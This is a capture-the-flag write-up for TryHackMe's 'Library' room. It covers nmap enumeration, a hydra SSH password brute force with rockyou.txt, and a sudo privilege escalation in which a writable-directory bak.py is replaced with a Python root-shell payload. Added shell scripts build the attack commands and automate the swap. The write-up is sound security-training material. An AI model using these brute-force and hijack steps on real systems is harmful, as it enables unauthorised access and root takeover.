Through The Looking Glass
Author
Shirish Ranjan
A padawan in the ways of red teaming and blogging with the goal of mastering techniques in hacking into anything this world has to offer
Library

Today we are going to solve the room named "Library" on the TryHackMe website. Well, without delaying any further, let's get right to it.

Task 1 - #1, #2

First we perform an nmap scan to check which ports are open and which services are running on them. The flags used with nmap for this scan were "-sC" for the default script scan, "-sV" for service version detection and "-p-" to scan all 65535 TCP ports instead of only the default top 1000. Ports 22 and 80 are open, running the SSH and HTTP services respectively. For now we have to shelve the idea of logging in via SSH because we do not have the required credentials.

Time to see what the application is like. It turns out to be a blog site with a bunch of sections, like the comments section and the post-comment section, that all live on one web page, and the page source does not contain anything relevant to this challenge. Just a hunch, but let's check out robots.txt: it lists the paths the site owner did not want crawled, which are often the interesting ones. Its User-agent is "rockyou", which must be a hint that we will find something if we use the wordlist rockyou.txt. So the first thing that comes to mind is directory busting with gobuster and rockyou.txt, but that does not show anything that stands out.

Let's try observing the website once again for any clues. And voilà! There is a blog post by a user named meliodas, which gives us a username. Since we know the username, let's find the password using hydra against the SSH service with rockyou.txt as the password list. Now that we have the password, the next step is to log in via SSH, since that is the service we were brute-forcing.

Once we have a connection to the target machine, we just have to find the flags. The first flag is in the user.txt file in the current directory. For the next flag we need escalated privileges. To find out how to get them we run "sudo -l", which lists the commands this user is allowed to run through sudo. On top of that there is an interesting file named bak.py in this directory. Let's try running that file with sudo. It couldn't be executed.
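The enumeration steps above, as an added example that is not part of the original post: a small shell script that pulls the open ports out of nmap's grepable output, reads the User-agent hint out of robots.txt, and builds the gobuster and hydra command lines that follow from them. The nmap output and robots.txt embedded in it are constructed samples (the real room's output differs in detail), and TARGET, the wordlist path and the hydra task count are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post. Parses constructed enumeration
# output and builds the follow-up commands described in the writeup.

TARGET="${TARGET:-10.10.10.10}"                            # assumption: room IP
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"   # assumption: Kali path

# Constructed sample of `nmap -sC -sV -p- -oG - $TARGET` (grepable output,
# tab-separated fields; service versions left blank on purpose).
NMAP_GREPABLE="$(printf '# Nmap scan (constructed sample)\nHost: %s ()\tStatus: Up\nHost: %s ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///\tIgnored State: closed (65532)\n# Nmap done\n' "$TARGET" "$TARGET")"

# Constructed robots.txt carrying the kind of hint the writeup describes.
ROBOTS="$(printf 'User-agent: rockyou\nDisallow: /\n')"

# open_ports GREPABLE_OUTPUT -> one "port/proto service" line per open port.
open_ports() {
    printf '%s\n' "$1" | awk -F'\t' '
        /Ports:/ {
            for (i = 1; i <= NF; i++) if ($i ~ /^Ports: /) {
                sub(/^Ports: /, "", $i)
                n = split($i, entry, /, */)
                for (j = 1; j <= n; j++) {
                    # fields: port/state/proto/owner/service/rpcinfo/version/
                    split(entry[j], f, "/")
                    if (f[2] == "open") print f[1] "/" f[3] " " f[5]
                }
            }
        }'
}

# robots_hint ROBOTS_TXT -> every non-wildcard User-agent value (the wordlist hint here).
robots_hint() {
    printf '%s\n' "$1" | awk -F': *' 'tolower($1) == "user-agent" && $2 != "*" { print $2 }'
}

# gobuster_cmd TARGET WORDLIST -> directory brute-force command line.
gobuster_cmd() {
    printf 'gobuster dir -u http://%s -w %s\n' "$1" "$2"
}

# hydra_cmd USER WORDLIST TARGET -> SSH password brute-force command line.
# -t 4 because hydra itself warns that SSH servers limit parallel logins.
hydra_cmd() {
    printf 'hydra -l %s -P %s -t 4 ssh://%s\n' "$1" "$2" "$3"
}

# Stand-alone run: show what the parsing yields and the commands to run next.
open_ports "$NMAP_GREPABLE"
for hint in $(robots_hint "$ROBOTS"); do echo "robots.txt hint: $hint"; done
gobuster_cmd "$TARGET" "$WORDLIST"
hydra_cmd meliodas "$WORDLIST" "$TARGET"
```

Point the script at a real scan with `nmap ... -oG scan.gnmap` and `open_ports "$(cat scan.gnmap)"`; the parser only looks at the tab-separated `Ports:` field, so extra script output from -sC does not confuse it.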
Since no password is required to run the higher-privileged command with sudo, I thought there was a chance that bak.py could be executed with higher privileges. The sudo rule specifies the location from which python may be run, so let's navigate to that folder, /usr/bin, and execute bak.py from there. sudo compares the resolved path of the command, and its arguments, with the rule, so the invocation has to match the way the rule spells it. Look, it's working. Now let's view the contents of the file. It is a script that gets executed with root privileges, but it lives in our own home directory. Let's replace it with a homemade bak.py of our own, deleting the original first, which gives us a root shell when we run it through sudo. Even if the file itself is root-owned and read-only to us, the directory it sits in belongs to us, so we can unlink it and create a new bak.py in its place; the sudo rule only names the path, not the content. Now that we have a root shell, let's navigate to where root.txt is located and grab that flag.
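The privilege-escalation step above, as an added example that is not part of the original post: a shell script that recreates, inside a temporary directory standing in for /home/meliodas, the permission check and the file swap. It decides whether the sudo-allowed script can be edited in place, unlinked and recreated, or neither, and then drops a replacement bak.py that hands back a root shell when sudo runs it. The sandbox paths, the read-only starting state of the file and the exact shape of the sudoers rule quoted in the comments are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post. Recreates, inside a temporary
# directory that stands in for /home/meliodas, the check and the file swap
# described above: a script that a NOPASSWD sudo rule lets us run as root can
# be hijacked if either the file or its parent directory is writable by us.

SANDBOX="$(mktemp -d)"
HOME_DIR="$SANDBOX/home/meliodas"     # stand-in for the real home directory
SCRIPT="$HOME_DIR/bak.py"             # stand-in for the sudo-allowed script

# Constructed starting state: the script exists and is read-only to us,
# which is how a root-owned 644 file looks from the user's side.
setup_sandbox() {
    mkdir -p "$HOME_DIR"
    chmod 755 "$HOME_DIR"
    rm -f "$SCRIPT"
    printf '%s\n' '# stand-in for the original backup script (constructed)' > "$SCRIPT"
    chmod 444 "$SCRIPT"
}

# swap_method FILE -> "writable" (edit in place), "replaceable" (the directory
# lets us unlink and recreate it) or "protected" (neither; no hijack this way).
swap_method() {
    if [ -w "$1" ]; then
        echo writable
    elif [ -w "$(dirname "$1")" ]; then
        echo replaceable
    else
        echo protected
    fi
}

# Replacement bak.py: sudo runs it as root, and it hands us a root shell.
# Invoke it exactly as the sudo rule spells it out (assumption: the rule
# names /usr/bin/python* and the script path), e.g.
#   sudo /usr/bin/python3 /home/meliodas/bak.py
# sudo compares the resolved command path and its arguments with the rule,
# so a differently spelled invocation is refused.
PAYLOAD='import os
os.execl("/bin/bash", "bash", "-p")'

# hijack FILE -> puts PAYLOAD at FILE using whichever swap the permissions allow.
hijack() {
    case "$(swap_method "$1")" in
        writable)    printf '%s\n' "$PAYLOAD" > "$1" ;;
        replaceable) rm -f "$1" && printf '%s\n' "$PAYLOAD" > "$1" ;;
        *)           return 1 ;;
    esac
    chmod 755 "$1"
}

# Stand-alone run against the sandbox.
setup_sandbox
echo "before: $(swap_method "$SCRIPT")"
hijack "$SCRIPT" && echo "payload in place at $SCRIPT"
head -n 1 "$SCRIPT"
rm -rf "$SANDBOX"
```

The same check is worth running against every NOPASSWD entry sudo -l prints, not just this one: a rule that points at a path under a directory the user owns is exploitable even when the file itself is root-owned, because unlinking needs write permission on the directory, not on the file.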